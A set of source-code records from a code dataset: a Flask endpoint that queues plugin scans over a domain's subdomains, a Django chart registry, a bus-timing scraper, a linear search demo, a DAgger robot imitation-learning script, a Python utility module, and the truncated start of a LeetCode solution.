plugins_scan_by_subdomain():\n if request.method==\"POST\":\n json_data=request.get_json()\n plugins_id_list=json_data['plugins_id_list']\n domains_list=json_data['domains_list']\n # 调用celery任务\n check_plugins_task.delay(plugins_id_list,domains_list)\n return {\"code\": 200, \"msg\": \"plugin scan task success\"}\n\n\n#传入一个一级域名,对数据库内该一级域名的所有二级域名进行每一个插件的扫描\n@pluginscan_blueprint.route('/scanbydomain',methods=['POST'])\ndef plggins_scan_by_maindomain():\n if request.method==\"POST\":\n #获取POST过来的数据\n json_data = request.get_json()\n plugins_id_list = json_data['plugins_id_list']\n domain = json_data['domain']\n #声明二级域名的列表\n\n subdomain_list=[]\n #通过domain获取所有的该domain的二级域名\n index=pa_domain.find_one({\"domain\":domain})\n if index:\n subdomain=index['subdomain']\n for sub in subdomain:\n subdomain_list.append(sub[\"sub_domain\"])\n #没有在数据库中找到该主域名\n else:\n return {\"code\": 202, \"msg\": \"did not find domain {0}\".format(domain)}\n\n if len(subdomain_list)>0:\n # 调用celery任务,并且获取任务id\n r=check_plugins_task.delay(plugins_id_list, subdomain_list)\n #记录任务id\n pa_taskid.insert({\"task_id\":r.task_id,\"add_time\":get_current_time(),\"task_info\":\"对{0}等域名进行插件扫描\".format(subdomain_list[0])})\n\n\n return {\"code\": 200, \"msg\": \"plugin scan task success\"}\n return {\"code\": 201, \"msg\": \"POST method need\"}\n\n\n\n\n\n\n\n","repo_name":"qq431169079/papapa","sub_path":"celery_app/pluginviews.py","file_name":"pluginviews.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"83"} +{"seq_id":"10786840325","text":"from django.db.models import Model\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom charts import BaseChart\n\nclass ChartPool(object):\n def __init__(self):\n self._charts = {}\n self._models = []\n\n def register_chart(self, chart_class):\n if not issubclass(chart_class, BaseChart):\n raise ValueError(_('Registered class must be a subclass '\n ' of charts.BaseChart)'))\n if not chart_class.slug:\n raise ImproperlyConfigured(_(\"Chart class must have a 'slug'\"))\n self._charts[chart_class.slug] = chart_class\n\n def get_all_charts(self):\n return [(chart_slug, chart_class.display_name or chart_class.__name__)\n for chart_slug, chart_class in self._charts.items()]\n\n def get_chart_class(self, chart_slug):\n return self._charts.get(chart_slug)\n\n def register_model(self, model):\n if not issubclass(model, Model):\n raise ValueError(_('Registered model must be a subclass '\n 'of djando.db.models.Model'))\n content_type = ContentType.objects.get_for_model(model)\n self._models.append(content_type.id)\n\n def get_all_models(self):\n return self._models\n\nchart_pool = ChartPool()\n","repo_name":"soad241/django-charts","sub_path":"charts/cms_plugin/chart_admin.py","file_name":"chart_admin.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"16784477700","text":"import pandas as pd\r\nimport csv\r\nimport time\r\n\r\nbus_data = []\r\npaths = []\r\npath_data = []\r\n\r\n\r\ndef arrive_time(number, trip, begin, end):\r\n url = f\"https://user.frdm.info/ckhung/saas/bus/taichung/timing4.php?rid={number}&timeformat=1&refresh=0&reverse=0&hidecar=0&dark=0&ivrno=&stopID=&stopName=\"\r\n df = pd.read_html(url)[3].values.tolist()\r\n # print(df)\r\n minutes = 0\r\n last_m = 0\r\n begin_m = 0\r\n end_m = 0\r\n begin_s = \"\"\r\n end_s = \"\"\r\n license_plate = \"\"\r\n b = True\r\n\r\n c = '↓'\r\n plate = 0\r\n time_ = 1\r\n if trip == \"回程\":\r\n df = df[::-1]\r\n plate = 4\r\n time_ = 3\r\n c = '↑'\r\n\r\n for station in df:\r\n current_m = convert_minute(station[time_])\r\n if not b:\r\n if station[plate] != c and license_plate != station[plate]:\r\n license_plate = station[plate]\r\n minutes += last_m\r\n if station[2] == end:\r\n minutes += current_m\r\n end_m = minutes\r\n if end_m == 0:\r\n end_s = \"即將到站\"\r\n else:\r\n end_s = f\"{end_m}分鐘\"\r\n break\r\n\r\n if b and station[2] == begin:\r\n begin_m = current_m\r\n license_plate = station[plate]\r\n if is_minute(station[time_]):\r\n begin_s = f\"{begin_m}分鐘\"\r\n else:\r\n begin_s = station[time_]\r\n b = False\r\n last_m = current_m\r\n\r\n in_bus_m = end_m - begin_m\r\n in_bus_s = f\"{in_bus_m}分鐘\"\r\n print(number, begin_m, end_m, in_bus_m, begin_s, end_s, in_bus_s)\r\n return begin_m, end_m, in_bus_m, begin_s, end_s, in_bus_s\r\n\r\n\r\ndef is_minute(s):\r\n if len(s) > 2 and s[:-2].isnumeric():\r\n return True\r\n return False\r\n\r\n\r\ndef convert_minute(s):\r\n m = 0\r\n if is_minute(s):\r\n m = int(s[:-2])\r\n\r\n return m\r\n\r\n\r\ndef read_bus_data():\r\n with open('bus.csv', newline='', encoding=\"utf-8\") as csvfile:\r\n rows = csv.reader(csvfile)\r\n\r\n next(rows, None)\r\n next(rows, None)\r\n tmp = []\r\n number = '???'\r\n trip = '???'\r\n for row in rows:\r\n if number == row[0] and trip == row[5]:\r\n tmp.append(row[4])\r\n else:\r\n bus_data.append(tmp)\r\n tmp = []\r\n number = row[0]\r\n trip = row[5]\r\n tmp.append(row[0])\r\n tmp.append(row[1])\r\n tmp.append(row[2])\r\n tmp.append(row[5])\r\n tmp.append(row[4])\r\n\r\n del bus_data[0]\r\n\r\n\r\ndef in_path(path, begin, end):\r\n b = True\r\n in_path_ = False\r\n for station in path[4:]:\r\n if b and station == begin:\r\n b = False\r\n if not b and station == end:\r\n in_path_ = True\r\n break\r\n\r\n return in_path_\r\n\r\n\r\ndef find_path(begin, end):\r\n paths.clear()\r\n for path in bus_data:\r\n if in_path(path, begin, end):\r\n paths.append(path[:4])\r\n\r\n\r\ndef get_path_data(begin, end):\r\n path_data.clear()\r\n find_path(begin, end)\r\n for path in paths:\r\n time.sleep(0.5)\r\n time_data = arrive_time(path[0], path[3], begin, end)\r\n\r\n if time_data[3] == \"末班駛離\" or time_data[4] == \"末班駛離\" or time_data[3] == \"離站\" or time_data[4] == \"離站\":\r\n continue\r\n a = 1\r\n path_data.append(path + list(time_data))\r\n print(path_data)\r\n return path_data\r\n\r\n\r\nif __name__ == \"__main__\":\r\n pass\r\n # read_bus_data()\r\n # print(in_path(bus_data[0], '忠明南路', '永春東七路'))\r\n # arrive_time('324', '回程', '牛頂頭', '台中精機')\r\n # find_path('臺中教育大學', '北區運動中心')\r\n # print(paths)\r\n # print(get_path_data('臺中教育大學', '干城站'))\r\n\r\n","repo_name":"LeeByte-R/Bus-Wait-Search","sub_path":"bus.py","file_name":"bus.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"23813531096","text":"\"\"\"\nFile: search.py\nDefines function for linearSearch.\n\"\"\"\n\ndef linearSearch(target, lyst):\n \"\"\"Returns the position of the target item if found, or -1 otherwise.\"\"\"\n index = 0\n while index < len(lyst):\n if target == lyst[index]:\n return index\n index += 1\n\n return -1\n\n \ndef main():\n \"\"\"Tests with three lists.\"\"\"\n print(linearSearch(3, [3, 5, 7, 9, 10]))\n print(linearSearch(3, [0, 1, 2]))\n # Will stop at second position.\n print(linearSearch(3, [0, 2, 4, 6]))\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"chekel321/Linear-Search-python-app","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"15350495271","text":"import argparse\n\nimport time\nimport os\nimport pickle\nimport numpy as np\nfrom utils.tensorboard_logging import Logger\n\n# kuka environment for Position control\nfrom envs.kukaEnvs import PCEnv\n\n# Save GIF of agent\nimport imageio\n\n# Debugging\nimport IPython\nimport utils.timing\nimport time\n\n# Prevent deprecation warnings for Tensorflow 1\nimport logging\nlogging.getLogger('tensorflow').setLevel(logging.ERROR)\n\nimport os, shutil\n\ndef import_sb():\n \"Avoid long imports before parsing\"\n # RL Algorithms and envs\nfrom stable_baselines.common.policies import MlpPolicy, FeedForwardPolicy, \\\n LstmPolicy\nfrom stable_baselines.common.vec_env import DummyVecEnv\nfrom stable_baselines import PPO2, A2C\n\n# Pre-training (Behavior Cloning)\nfrom stable_baselines.gail import ExpertDataset\n\n\ndef delete_contents(folder):\n if os.path.exists(folder):\n for filename in os.listdir(folder):\n file_path = os.path.join(folder, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print('Failed to delete %s. Reason: %s' % (file_path, e))\n\ntimer = timing.timer()\n\nclass CustomLSTMPolicy(LstmPolicy):\n def __init__(self, sess, ob_space, ac_space, n_env, n_steps, n_batch, n_lstm=64, reuse=False, **_kwargs):\n super().__init__(sess, ob_space, ac_space, n_env, n_steps, n_batch, n_lstm, reuse,\n net_arch=[8, 'lstm', dict(vf=[5, 10], pi=[10])],\n layer_norm=True, feature_extraction=\"mlp\", **_kwargs)\n\n# Custom MLP policy of three layers of size 128 each\nclass CustomMLPPolicy(FeedForwardPolicy):\n def __init__(self, *args, **kwargs):\n super(CustomMLPPolicy, self).__init__(*args, **kwargs,\n net_arch=[24, 150, 150,\n dict(pi=[128, 128, 128],\n vf=[128, 128, 128])],\n feature_extraction=\"mlp\")\n\ndef test_agent(model):\n \"Run the agent and recover its trajectory\"\n traj = []\n obs = model.env.reset()\n traj.append(obs[0])\n action = model.predict(obs, deterministic=False)\n for _ in range(5000):\n action = model.predict(obs, deterministic=True)\n obs, _, _, _ = model.env.step(action[0]) # PPO2 vectorizes the env\n traj.append(obs[0]) # observation is vectorized\n model.env.reset()\n return traj\n\ndef visualize_agent(model):\n visualize_env = PCEnv(render=True)\n obs = visualize_env.reset()\n action = model.predict(obs)\n for _ in range(5000):\n action = model.predict(obs)\n obs, _, _, _ = visualize_env.step(action[0]) # PPO2 vectorizes the env\n time.sleep(1/240)\n visualize_env.close()\n\ndef save_gif(model, filename=\"DAgger_agent.gif\", time=5, fps=30):\n images = []\n obs = model.env.reset()\n img = model.env.render(mode='rgb_array')\n images.append(img)\n for i in range(int(time*240)):\n action, _ = model.predict(obs, deterministic=True)\n obs, _, _ ,_ = model.env.step(action)\n # fps is lower than render timestep, skip frames for real-time gif\n if i % int(240/fps) == 0:\n img = model.env.render(mode='rgb_array')\n images.append(img)\n\n # Save to Gif File\n imageio.mimsave(\n filename,\n [np.array(img) for i, img in enumerate(images) if i%2 == 0],\n fps=fps)\n\ndef Dagger(env, algorithm, policy, iterations,\n batch_size=256,\n episodes_per_it=1,\n epochs_per_dataset=10,\n gif_interval=None):\n\n log_dir = \"log/DAgger\"\n os.makedirs(log_dir, exist_ok=True)\n tb_log = Logger(log_dir)\n\n # Save a gif of the model every 10% of the total number of iterations\n if gif_interval is None:\n # Prevent modulo by zero\n if iterations < 10:\n gif_interval = 1\n else:\n gif_interval = int(iterations / 20)\n\n # Create log dir\n gif_dir = \"gifs/DAgger\"\n os.makedirs(gif_dir, exist_ok=True)\n\n # Create an agent in the environment\n model = algorithm(policy,\n env,\n verbose=1,\n tensorboard_log=\"log/\"\n )\n\n # Generate the first expert Dataset\n env.onscreen_title(\"First Trajectory\", text_size=5)\n dataset = env.generate_expert_traj(num_episodes=1, episode_timesteps=5000)\n\n dataset_info = {\n \"num_traj\":[],\n \"num_transition\":[],\n \"avg_ret\":[],\n \"std_ret\":[]\n }\n\n print()\n for i in range(iterations):\n print(\"--- Iteration {} Performance ---\".format(i))\n t_it_start = time.time()\n\n # Load the expert trajectories created by PID\n exp_dataset = ExpertDataset(\n traj_data=dataset,\n randomize=True,\n batch_size=batch_size,\n verbose=0)\n\n # Behavior Cloning on the dataset\n t_pretrain_start = time.time()\n model.pretrain(exp_dataset, n_epochs=epochs_per_dataset)\n t_pretrain_end = time.time()\n print(\"Pretraining Time {:.0f} s\".format(t_pretrain_end-t_pretrain_start))\n\n\n # Dict for storing episode data as generated by expert\n buffer = {\n \"actions\": np.array([]),\n \"episode_returns\": np.array([]),\n \"rewards\": np.array([]),\n \"obs\": np.array([]),\n \"episode_starts\": np.array([])\n }\n\n # TODO Parallelize with VecEnv\n t_test_start = time.time()\n for n in range(episodes_per_it):\n # Run agent and record its trajectory\n env.onscreen_title(\"Test {}\".format(i))\n traj = test_agent(model)\n\n # Get expert dataset from that trajectory\n # Run agent and record its trajectory\n env.onscreen_title(\"Anotate Test {}\".format(i), text_size=5)\n new_trajectory = env.generate_expert_from_traj(traj)\n\n # Add that episode to the a buffer\n if n == 0:\n for key in buffer.keys():\n buffer[key] = new_trajectory[key]\n else:\n for key in buffer.keys():\n buffer[key] = np.concatenate((buffer[key],\n new_trajectory[key]))\n t_test_end = time.time()\n\n # Add to the pretraining Dataset\n for key in dataset.keys():\n dataset[key] = np.concatenate((dataset[key],buffer[key]))\n\n # Save iteration performance data\n returns = buffer[\"episode_returns\"]\n avg_ret = sum(returns) / len(returns)\n std_ret = np.std(np.array(returns))\n dataset_info[\"avg_ret\"].append(avg_ret)\n dataset_info[\"std_ret\"].append(std_ret)\n\n print(\"Episode Returns -> avg_ret: {:.0f} std_ret {:.0f}\".format(avg_ret,std_ret))\n print(\"Testing Time {:.0f} s\".format(t_test_end-t_test_start))\n tb_log.log_scalar('avg_ret', avg_ret, i)\n\n if gif_interval != 0 and (i % gif_interval) == 0:\n t_gif_start = time.time()\n save_gif(model, time=5, filename=\"gifs/DAgger/DAgger_iteration_{}.gif\".format(i))\n t_gif_end = time.time()\n print(\"Gif saving {:.0f} s\".format(t_gif_end-t_gif_start))\n\n t_it_end = time.time()\n print(\"Total Time {:.0f} s\".format(t_it_end-t_it_start))\n print()\n\n with open('training_data/DAgger/dagger_training_data_{}_iterations.pkl'.format(iterations),'wb') as f:\n pickle.dump(dataset_info, f)\n\n np.savez(\"PID_expert_path.npz\", **dataset)\n return model\n\ndef make_env(env_type):\n def _init():\n return env_type\n return _init\n\ndef parse_args():\n my_parser = argparse.ArgumentParser(\n description='Imitation learning of position control using th DAgger Algorithm')\n\n my_parser.add_argument('--test',\n help='Test the last trained model',\n action=\"store_true\")\n\n my_parser.add_argument('--iterations', '-i',\n type=int,\n help='Iterartions of the DAgger algorithm',\n default=15)\n\n my_parser.add_argument('--rl_timesteps', '-r',\n type=int,\n help='Run a DeepRL algorithm after dagger for RL_TIMESTEPS timesteps',\n default=0)\n\n my_parser.add_argument('--gif_interval', '-g',\n type=int,\n help='Interval at wich to save a gif of the trained agent',\n default=0)\n\n my_parser.add_argument('--gui',\n help='Show a window view of the robot during the program (slows down traning)',\n action=\"store_true\")\n\n # Execute parse_args()\n args = my_parser.parse_args()\n\n return args\n\nif __name__ == '__main__':\n\n args = parse_args()\n\n # DAgger parameters\n test = args.test\n dagger_iterations = args.iterations\n gif_interval = args.gif_interval\n\n # DeepRL after DAgger\n algorithm = A2C\n policy = CustomMLPPolicy\n rl_timesteps = args.rl_timesteps\n training_time = int(1e5)\n tensorboard_log=\"./{}_{}/\".format(algorithm.__name__, policy.__name__)\n\n # Create the environment\n env = PCEnv(gui=args.gui)\n\n if not test:\n # Clean up last run results\n delete_contents(\"gifs/\")\n delete_contents(\"log/\")\n delete_contents(\"models/\")\n\n # Learn with Imitation Learning using DAgger\n model = Dagger(env, algorithm, policy, dagger_iterations,\n epochs_per_dataset=100,\n gif_interval=gif_interval,\n batch_size=8*4096)\n\n model_dir = \"models/DAgger\"\n os.makedirs(model_dir, exist_ok=True)\n model_name=\"Dagger_{}_iterations\".format(dagger_iterations)\n model.save(os.path.join(model_dir+model_name))\n save_gif(model, filename=\"gifs/{}.gif\".format(model_name))\n\n # Optimize further with RL\n if rl_timesteps > 0:\n model.learn(rl_timesteps)\n model_name=\"DAgger_and_{}_{:.0f}e5_timesteps\".format(algorithm.__name__ ,\n rl_timesteps/10000)\n model.save(\"models/\"+model_name)\n save_gif(model, filename=\"gifs/{}.gif\".format(model_name))\n\n print(\"Training Done!\")\n\n else:\n env = DummyVecEnv([make_env(env)])\n model_name = \"Dagger_model\"\n model = algorithm.load(\"models/\"+model_name, env=env)\n t_gif_start = time.time()\n save_gif(model, filename=\"gifsave_test.gif\")\n t_gif_end = time.time()\n print(\"Gif creating time: {:.0f}s\".format(t_gif_end-t_gif_start))\n\n env.close()\n","repo_name":"imontesino/pybullet-iiwa","sub_path":"DAgger.py","file_name":"DAgger.py","file_ext":"py","file_size_in_byte":10984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"24973738856","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\"\"\"\n# SPDX-License-Identifier: LGPL-3.0\n\n__all__ = \"\"\"\ncached_property\ncoalesce\ndict_of\nget_class\nidentity\nlist_of\nset_of\nsmartmatch\ntupley\n\"\"\".split()\n\nimport importlib\nimport inspect\nimport re\nimport threading\nimport types\n\n_NOT_FOUND = object()\n\n\ndef identity(x):\n \"\"\"The identity function, returns its (single) argument\"\"\"\n return x\n\n\n# Dumb container for python 2 support in list_of() and dict_of()\nclass _Container(object):\n pass\n\ndef list_of(conv, container=list, package=None, frame=1):\n \"\"\"\n An :py:class:`amethyst.core.obj.Attr` helper function which will\n validate a list of values. Sample usage::\n\n class MyObject(Object):\n foo = Attr(list_of(float))\n\n obj = MyObject(foo=\"23\")\n print(obj.foo) # [ 23 ] - a list with an int\n\n obj.foo = (1, 2, \"23\")\n print(obj.foo) # [ 1, 2, 23 ] - a list not a tuple\n\n\n :param conv: The conversion function or class. If a class, objects in\n the list which are not already objects of this class will be inflated\n using the class. If passed a string, it will be converted to a class\n (or function) using the :py:func:`get_class` function.\n\n :param container: Constructor which can take a generator and return\n your desired list-like object. For instance, the :py:func:`set_of`\n function passes `container=set`.\n\n :param package: String or package object to use as the base for\n relative imports. When specified, is passed unmodified to\n :py:func:`get_class`.\n\n :param frame: Frame depth, as described in :py:func:`get_class`.\n\n \"\"\"\n c = _Container() # Closure variable for python 2 support (don't have \"nonlocal\")\n if frame and package is None and not callable(conv) and (conv.startswith('.') or '.' not in conv):\n package = inspect.getmodule(inspect.stack()[frame][0])\n\n def wrapper(thingun):\n # May not pre-compute these to allow list_of(\"Foo\") to be called\n # within the declaration of the Foo class.\n if not getattr(c, 'initialized', False):\n c.initialized = True\n c.conv = conv if callable(conv) else get_class(conv, package=package, frame=None)\n c.conv_is_type = isinstance(c.conv, type)\n return container(\n (x if c.conv_is_type and isinstance(x, c.conv) else c.conv(x))\n for x in tupley(thingun)\n )\n return wrapper\n\n\ndef set_of(conv, package=None, frame=1):\n \"\"\"\n Like :py:func:`list_of`, but uses a set container rather than a list\n container.\n \"\"\"\n return list_of(conv, container=set, frame=frame+1)\n\n\ndef dict_of(conv, key_conv=identity, set_key=None, package=None, frame=1):\n \"\"\"\n An :py:class:`amethyst.core.obj.Attr` helper function which will\n validate a dict of values and optionally keys. Sample usage::\n\n class MyObject(Object):\n name = Attr()\n foo = Attr(dict_of(\"MyObject\"))\n\n obj1 = MyObject(name=\"Alice\")\n obj2 = MyObject(foo={ \"a\": obj1, \"b\": dict(name=\"Bob\") })\n\n In the example, ``obj2.foo`` will be a dictionary with two items. Both\n values will be MyObject objects, the \"b\" item having been auto-inflated.\n\n .. WARNING::\n The produced attribute value is a normal python dict. Automatic\n inflation only occurs when initially setting the attribute. Normal\n accesses to the attribute dictionary will not validate or\n auto-inflate. For instance, ``obj2.foo[\"c\"] = dict(name=\"Carol\")``\n will store a python dict to key \"c\", not a MyObject.\n\n :param conv: The conversion function or class. If a class, values in\n the dict which are not already objects of this class will be inflated\n using the class. If passed a string, it will be converted to a class\n (or function) using the :py:func:`get_class` function.\n\n :param key_conv: Conversion function for keys, defaults to identity\n function.\n\n :param set_key: Optional callable passed key name and inflated value\n object. Can be used to set an attribute on the value objects based on\n keys. For instance, we might use ``set_key=lambda k, v: setattr(v,\n \"name\", v.name or k)`` to set default \"name\" attributes.\n\n :param package: String or package object to use as the base for\n relative imports. When specified, is passed unmodified to\n :py:func:`get_class`.\n\n :param frame: Frame depth, as described in :py:func:`get_class`.\n\n \"\"\"\n c = _Container() # Closure variable for python 2 support (don't have \"nonlocal\")\n if package is None and (\n (not callable(conv) and (conv.startswith('.') or '.' not in conv))\n or (not callable(key_conv) and (key_conv.startswith('.') or '.' not in key_conv))\n ):\n package = inspect.getmodule(inspect.stack()[frame][0])\n\n def wrapper(d):\n # May not pre-compute these to allow list_of(\"Foo\") to be called\n # within the declaration of the Foo class.\n if not getattr(c, 'initialized', False):\n c.initialized = True\n c.conv = conv if callable(conv) else get_class(conv, package=package, frame=None)\n c.conv_is_type = isinstance(c.conv, type)\n c.key_conv = key_conv if callable(key_conv) else get_class(key_conv, package=package, frame=None)\n c.key_conv_is_type = isinstance(c.key_conv, type)\n\n rv = dict()\n for k, v in d.items():\n key = k if c.key_conv_is_type and isinstance(k, c.key_conv) else c.key_conv(k)\n val = v if c.conv_is_type and isinstance(v, c.conv) else c.conv(v)\n if set_key:\n set_key(key, val)\n rv[key] = val\n return rv\n\n return wrapper\n\n\ndef get_class(name, package=None, frame=1):\n \"\"\"\n Load a class (or function or other package attribute) from a string\n name. Automatically imports required package. Requested name may be\n relative. If relative and no package is passed, the call stack is\n examined at the frame counter and imports are relative to that package.\n\n ::\n\n get_class(\"foo.Bar\") # Bar class from package foo\n get_class(\".Foo\") or get_class(\"Foo\") # Foo class from current package\n get_class(\".Foo\", frame=2) # Foo class from caller's package\n\n :param str name: A string containing a package name and class or object\n name joined by a dot. The package will be loaded and the attribute will\n be returned. From the name of the function, the intention if for\n automatic loading of classes. For example,\n `get_class(\"amethyst.core.Object\")`, however, python doesn't really\n distinguish between loading a class and loading a function or other\n package variable, so the object after the last dot can really be\n anything available in the package -- even unrelated imports to the\n package! For this reason, if classes or packages are imported for user\n or configuration input, it is a good idea to verify that the imported\n object matches some expected base class.\n\n :param package: String or package object to use as the base for\n relative imports.\n\n :param frame: Frame depth, for the default base package. When set to 1,\n relative class names are looked up relative to the caller's package.\n When set to a larger value, will look up relative to the caller's\n caller's ... package. Set to 0 or None (or set an explicit value for\n *package* to disable automatically selecting a base package.\n\n \"\"\"\n # Rewrite \"Foo\" as \".Foo\"\n if '.' not in name:\n name = '.' + name\n\n # Split out module and object name\n mod = name[0:name.rindex(\".\")]\n cls = name[len(mod)+1:]\n pkg = package if isinstance(package, types.ModuleType) else None\n # if name is \".Foo\" or \"..Foo\" we should not have stripped off a \".\"\n if mod in ('', '.'):\n mod = mod + '.'\n\n # Inspect stack and get calling package if relative name\n if frame and package is None and name.startswith('.') or '.' not in name:\n try:\n pkg = inspect.getmodule(inspect.stack()[frame][0])\n except Exception:\n pass\n\n # Special case for \".Foo\", we got the package directly\n if mod == '.' and pkg:\n pass\n else:\n if pkg and (package is None or isinstance(package, types.ModuleType)):\n package = pkg.__name__\n pkg = importlib.import_module(mod, package)\n return getattr(pkg, cls)\n\n\ndef tupley(thingun):\n \"\"\"\n Make sure thingun is like a tuple - a list, set, tuple. If not, wraps\n thingun into a single-item or empty (when None) tuple.\n \"\"\"\n if thingun is None:\n return ()\n if isinstance(thingun, (list, tuple, set, frozenset)):\n return thingun\n return (thingun,)\n\n\ndef coalesce(*args):\n \"\"\"\n Returns first argument which is not `None`. If no non-None argumenst,\n then will return `None`. Also returns `None` if argument list is empty.\n \"\"\"\n for x in args:\n if x is not None:\n return x\n return None\n\n\nRE_TYPE = type(re.compile(\"^$\"))\nNONE_TYPE = type(None)\ndef smartmatch(val, other):\n \"\"\"\n Smart match against a value\n\n Convenient function to use in attribute validation. Attempts to\n determine if a value is like other values. Behavior depends on type of\n the other object:\n\n * `list`, `tuple`, `set`, `frozenset`: Test membership and return the value\n unmodified.\n\n * `dict`: Look up the item and return the hashed value.\n\n * compiled `regex`: call ``other.search(val)``. Remember to anchor your\n search if that is desired!\n\n * `callable`: call ``other(val)`` and return the result\n\n * `type`, `NoneType`: Test ``val is other`` and, if true, return value\n\n * anything else: Test ``val == other`` and, if true, return value\n\n If none of the above match, raises a :py:exc:`ValueError`\n \"\"\"\n if isinstance(other, (list, tuple, set, frozenset)):\n if val in other:\n return val\n\n elif isinstance(other, dict):\n if val in other:\n return other[val]\n\n elif isinstance(other, RE_TYPE):\n if other.search(val):\n return val\n\n elif callable(other):\n return other(val)\n\n elif isinstance(other, (type, NONE_TYPE)):\n if val is other:\n return val\n\n elif val == other:\n return val\n\n raise ValueError(\"Invalid Value\")\n\n\nclass cached_property(object):\n \"\"\"\n Lazy Attribute Memoization\n\n .. NOTE:: functools in python 3.8 includes a cached_property decorator.\n It should be used in place of this for most cases.\n\n Creates properties with deferred calculation. Once calculated, the\n result is stored and returned from cache on subsequent access. Useful\n for expensive operations which may not be needed, or to ensure\n just-in-time construction (I like using this for database connections\n or building subwidgets in GUI classes, see examples below).\n\n Decorator Usage (most common)::\n\n class Foo(object):\n @cached_property\n def bar(self):\n print(\"Computing...\")\n return 42 # or expensive_calculation()\n\n foo = Foo()\n\n print(foo.bar) # Computing... 42\n print(foo.bar) # 42\n\n foo.bar = 12\n print(foo.bar) # 12\n\n del foo.bar # Clears the cache\n print(foo.bar) # Computing... 42\n\n Direct use allows calculation to be closure or dynamically chosen.\n The bar attribute will behave the same as above::\n\n class Foo(object):\n def __init__(self, **kwargs):\n def expensive_calculation():\n ...\n\n self.bar = cached_property(expensive_calculation, \"bar\")\n\n\n Example: Automatic, thread-safe, database connections::\n\n import threading\n import sqlite3\n from amethyst.core import cached_property\n\n class MyObject(object):\n def __init__(self, **kwargs):\n self._thr_local = threading.local()\n\n @cached_property(delegate=\"_thr_local\")\n def db(self):\n conn = sqlite3.connect(\"mydb.sqlite3\")\n conn.execute(\"PRAGMA foreign_keys=ON\")\n return conn\n\n # obj.db will be a different connection in each thread\n # and will only connect if used in the thread\n\n\n Example: GUI widget building::\n\n import wx\n from amethyst.core import cached_property as widget\n\n class SimpleWindow(wx.Frame):\n def __init__(self, *args, **kwargs):\n super(SimpleWindow, self).__init__(*args, **kwargs)\n self.sizer.Add(self.button1)\n self.sizer.Add(self.button_exit)\n\n @widget\n def sizer(self):\n widget = wx.BoxSizer(wx.VERTICAL)\n self.SetSizer(widget)\n return widget\n\n @widget\n def button1(self):\n widget = wx.Button(self, wx.ID_ANY, \"Do Something\")\n widget.Bind(wx.EVT_BUTTON, self.on_click1)\n return widget\n\n @widget\n def button_exit(self):\n widget = wx.Button(self, wx.ID_ANY, \"Exit\")\n widget.Bind(wx.EVT_BUTTON, lambda evt: wx.Exit())\n return widget\n\n def on_click1(self, evt):\n print(\"Ouch!\")\n\n class MyApp(wx.App):\n def OnInit(self):\n self.mainwindow.Show(True)\n self.SetTopWindow(self.mainwindow)\n return True\n\n @widget\n def mainwindow(self):\n return SimpleWindow(None, -1, \"This is a test\")\n\n app = MyApp(0)\n app.MainLoop()\n \"\"\"\n def __init__(self, meth=None, name=None, delegate=None):\n \"\"\"\n :param meth: The method being decorated. Typically not passed to\n the constructor explicitly, see examples.\n\n :param name: Key name to use in object dict (or delegate attribute\n name). Automatically extracted from decorated method name if not\n specified.\n\n :param delegate: Attribute name containing an object to delegate\n storage to. If not `None`, the `name` attribute of `delegate`\n will be accessed (via `getattr`, `setattr`, and `delattr`) when\n determining whether to recompute the cached property and to\n store the computed property value (see example).\n\n .. NOTE:: If you aren't using the name or delegate options and can\n depend on python >= 3.8, the core functools package includes a\n cached_property decorator that should be used instead.\n \"\"\"\n self.name = name\n self.delegate = delegate\n self.lock = threading.RLock()\n\n # Simplify implementations by just coding different methods.\n # Python name mangling prevents setting self.__xxx__ directly.\n if delegate:\n self._get = self.get_delegate\n self._set = self.set_delegate\n self._del = self.del_delegate\n else:\n self._get = self.get_obj_dict\n self._set = self.set_obj_dict\n self._del = self.del_obj_dict\n if meth is not None:\n self(meth)\n\n def __call__(self, meth):\n self.meth = meth\n if self.name is None:\n self.name = meth.__name__\n return self\n\n def __get__(self, obj, typ=None):\n return self._get(obj, typ)\n def __set__(self, obj, value):\n self._set(obj, value)\n def __delete__(self, obj):\n self._del(obj)\n\n # object-dict storage\n def get_obj_dict(self, obj, typ=None):\n rv = obj.__dict__.get(self.name, _NOT_FOUND)\n if rv is _NOT_FOUND:\n with self.lock:\n rv = obj.__dict__.get(self.name, _NOT_FOUND) # no races\n if rv is _NOT_FOUND:\n obj.__dict__[self.name] = rv = self.meth(obj)\n return rv\n\n def set_obj_dict(self, obj, value):\n obj.__dict__[self.name] = value\n\n def del_obj_dict(self, obj):\n # Ignore exceptions to allow defensive clearing of the cache\n obj.__dict__.pop(self.name, None)\n\n # delegate storage\n def get_delegate(self, obj, typ=None):\n delegate = getattr(obj, self.delegate)\n rv = getattr(delegate, self.name, _NOT_FOUND)\n if rv is _NOT_FOUND:\n with self.lock:\n rv = getattr(delegate, self.name, _NOT_FOUND) # no races\n if rv is _NOT_FOUND:\n rv = self.meth(obj)\n setattr(delegate, self.name, rv)\n return rv\n\n def set_delegate(self, obj, value):\n setattr(getattr(obj, self.delegate), self.name, value)\n\n def del_delegate(self, obj):\n delattr(getattr(obj, self.delegate), self.name)\n","repo_name":"duelafn/python-amethyst-core","sub_path":"amethyst/core/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":16860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"4280026153","text":"class Solution(object):\n def maxJumps(self, arr, d):\n \"\"\"\n :type arr: List[int]\n :type d: int\n :rtype: int\n \"\"\"\n n = len(arr)\n dp = [1] * 